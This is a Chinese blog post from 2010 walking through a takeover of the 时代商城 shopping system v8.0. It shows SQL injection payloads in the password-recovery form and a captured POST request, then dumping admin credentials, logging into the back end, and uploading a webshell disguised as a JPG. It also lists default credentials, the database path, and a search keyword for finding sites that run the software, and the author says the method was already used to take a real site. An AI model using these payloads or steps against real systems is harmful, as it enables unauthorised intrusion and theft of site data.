时代商城购物系统找回密码漏洞

2010, January 20, 4:46 PM. 原创笔记
Submitted by admin

From http://www.st999.cn/blog  By 流浪的风

无聊,想起前几天在闷豆帮助下拿的一个购物站,源码是时代商城购物系统,下载个源码,本地测试一下那个找回密码漏洞,版本是8.0的,以前的版本我没试,不过应该也会存在的吧。

首先,要注册个用户,退出,并在首页的登录框那儿,有个“忘密”,点击进入取回密码处。见图,

大小: 8.82 K
尺寸: 416 x 195
浏览: 49 次
点击打开新窗口浏览全图

正常的找回密码是输入你要找回密码的用户名,但我们是属于非正常的那种,先判断是否存在注入。

在密码取回框输入:

st999' and '1'='1   跳出获取密码的答案询问框

大小: 11.21 K
尺寸: 500 x 120
浏览: 66 次
点击打开新窗口浏览全图

st999' and '1'='2  查无此用户,请返回

大小: 5.43 K
尺寸: 241 x 136
浏览: 76 次
点击打开新窗口浏览全图

可以判断此处存在着注入漏洞。

我们再抓包试试

POST /profile.asp?action=repass&shop=1 HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://192.168.1.203/profile.asp?action=repass
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; WebSaver; CIBA; .NET CLR 2.0.50727)
Host: 192.168.1.203
Content-Length: 66
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDCQAABSDS=GAMFGKEDKHCKNCJLMGIAJLJN; ASPSESSIONIDCSDDCRCT=HHKHGGFDKAJHDMICAMKPINHN

username=st999%27+and+%271%27%3D%271&Submit=%C8%B7%26nbsp%3B%B6%A8

构造URL:http://192.168.1.203/profile.asp?action=repass&shop=1&username=st999

直接在IE打开返回的还是查无此用户,

大小: 67.83 K
尺寸: 500 x 215
浏览: 33 次
点击打开新窗口浏览全图

那么我们用注入中转的来试试。

大小: 53.27 K
尺寸: 500 x 258
浏览: 34 次
点击打开新窗口浏览全图

大小: 75.26 K
尺寸: 500 x 323
浏览: 42 次
点击打开新窗口浏览全图

返回正常了

那么就用工具来试试吧,我是懒人,用手工真的是太累!

表名是admin,字段名是admin和userpassword,如果工具暴不出的话,就自己手动添加吧。

大小: 67.15 K
尺寸: 500 x 397
浏览: 41 次
点击打开新窗口浏览全图

用户名和密码都出来了。

默认的后台是admin,登录,拿shell。

大小: 181.51 K
尺寸: 500 x 428
浏览: 37 次
点击打开新窗口浏览全图

随便找个地方上传个JPG格式的小马,然后备份数据。

大小: 62.47 K
尺寸: 500 x 280
浏览: 30 次
点击打开新窗口浏览全图大小: 44.73 K
尺寸: 500 x 86
浏览: 32 次
点击打开新窗口浏览全图大小: 66.81 K
尺寸: 500 x 332
浏览: 29 次
点击打开新窗口浏览全图

小马传大马,OK,webshell到手。。。

后记:

默认后台  admin

默认用户名和密码  admin admin

默认数据库  Data\#TimesShop.mdb

关键字: cat.asp?catid=

用这程序的人还是挺多的

« 上一篇 | 下一篇 »

只显示10条记录相关文章
脚本安全之第四章 万能密码漏洞 (浏览: 9962, 评论: 0)
MSN Editor 漏洞 (浏览: 11639, 评论: 0)
Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):